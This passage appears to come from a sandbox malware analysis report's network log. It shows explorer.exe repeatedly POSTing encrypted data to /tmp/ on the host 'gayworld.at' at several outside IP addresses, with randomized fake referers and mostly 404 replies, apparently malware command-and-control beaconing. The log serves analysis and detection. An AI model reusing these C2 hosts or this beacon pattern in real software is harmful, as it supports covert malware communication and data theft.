                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.549695175.120.254.980C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:20:40.724772930 CEST104OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://vqhcrffxeq.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 174
                  Host: gayworld.at
                  Oct 10, 2022 23:20:40.728177071 CEST104OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 1f ff 82
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA .[k,vuNC8SG_i<H=fRo|>(9\kE2*UF)=t,@ez
                  Oct 10, 2022 23:20:41.908329010 CEST105INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:41 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 8
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 04 00 00 00 72 e8 87 ea
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  20192.168.2.549715175.120.254.980C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:27.468192101 CEST160OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://gjcuybim.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 168
                  Host: gayworld.at
                  Oct 10, 2022 23:21:27.468229055 CEST160OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 23 1b d6 ad
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu#j8szL^~+.v>5]-lGd0f|&/IT$J>6t8
                  Oct 10, 2022 23:21:28.664248943 CEST160INHTTP/1.1 200 OK
                  Date: Mon, 10 Oct 2022 21:21:28 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=utf-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  21192.168.2.549716123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:28.975450039 CEST161OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://xyeynuw.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 307
                  Host: gayworld.at
                  Oct 10, 2022 23:21:28.975466013 CEST161OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 27 25 fa e8
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu'%wc _E-d9+=$t0]!W|IQk''*y#_THfb#.(mg+59
                  Oct 10, 2022 23:21:30.171087027 CEST162INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:29 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  22192.168.2.549717175.120.254.980C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:30.478796005 CEST163OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://aaidrfo.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 317
                  Host: gayworld.at
                  Oct 10, 2022 23:21:30.478827000 CEST164OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 54 15 e2 f2
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuT8EnD-QS<7V{#}hZ17 U(TP{zO0=pF:^pUdnQ-@3fsK\DV~(bR
                  Oct 10, 2022 23:21:31.674793005 CEST164INHTTP/1.1 200 OK
                  Date: Mon, 10 Oct 2022 21:21:31 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=utf-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  23192.168.2.549718175.120.254.980C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:31.972645044 CEST165OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://dhgat.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 207
                  Host: gayworld.at
                  Oct 10, 2022 23:21:31.972681046 CEST165OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 28 3c d5 fa
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu(<DIwKb[&7hQA;#}bR9!gC>n{V[(5+e6(_)-^L2C
                  Oct 10, 2022 23:21:33.152183056 CEST166INHTTP/1.1 200 OK
                  Date: Mon, 10 Oct 2022 21:21:32 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=utf-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  24192.168.2.549719211.171.233.12680C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:33.465965033 CEST167OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://tusjn.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 165
                  Host: gayworld.at
                  Oct 10, 2022 23:21:33.466011047 CEST167OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 7a 43 cd 88
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuzC;oHSwh946E~XS%:0-=;V<*$*q(
                  Oct 10, 2022 23:21:34.739589930 CEST167INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:34 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  25192.168.2.549720109.102.255.23080C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:35.785954952 CEST168OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://cprumtbxh.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 338
                  Host: gayworld.at
                  Oct 10, 2022 23:21:35.785999060 CEST169OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 6c 5f b7 f9
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vul_M^sjTwY/nYu!3]wrA(AKkGJZt`${`_(lGJ,3UTQ-B7e`oCtxm4-
                  Oct 10, 2022 23:21:36.006616116 CEST169INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:35 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  26192.168.2.549721123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:36.299575090 CEST170OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://yhuni.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 219
                  Host: gayworld.at
                  Oct 10, 2022 23:21:36.299638033 CEST171OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 30 3e df f0
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu0>m-lOWfh,^R:hn,R:a^XJkH(EiizEK8upq,RO(Zzu
                  Oct 10, 2022 23:21:37.198333979 CEST171INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:36 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  27192.168.2.549722123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:37.493453026 CEST172OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://bexxetwrlu.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 237
                  Host: gayworld.at
                  Oct 10, 2022 23:21:37.493484974 CEST173OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 72 0f a3 8d
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuruOo=$uep\bfhCOai%M|XGjs a_9V!&(#Ky1Tba#
                  Oct 10, 2022 23:21:38.672943115 CEST173INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:38 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  28192.168.2.549723211.171.233.12980C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:38.968161106 CEST174OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://wrsfqkp.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 159
                  Host: gayworld.at
                  Oct 10, 2022 23:21:38.968161106 CEST175OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 32 54 cf 9a
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu2Tr*ML3d-&=/j3#aVP_?'%RnDL
                  Oct 10, 2022 23:21:39.942960024 CEST175INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:39 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  29192.168.2.549724195.158.3.16280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:40.109589100 CEST176OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://vorjorv.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 196
                  Host: gayworld.at
                  Oct 10, 2022 23:21:40.109636068 CEST177OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 3d 4c e4 9e
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu=LE'z-cnqxUh150tM;/K~"6QQ"$]rYaxM
                  Oct 10, 2022 23:21:40.615967035 CEST177INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:40 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 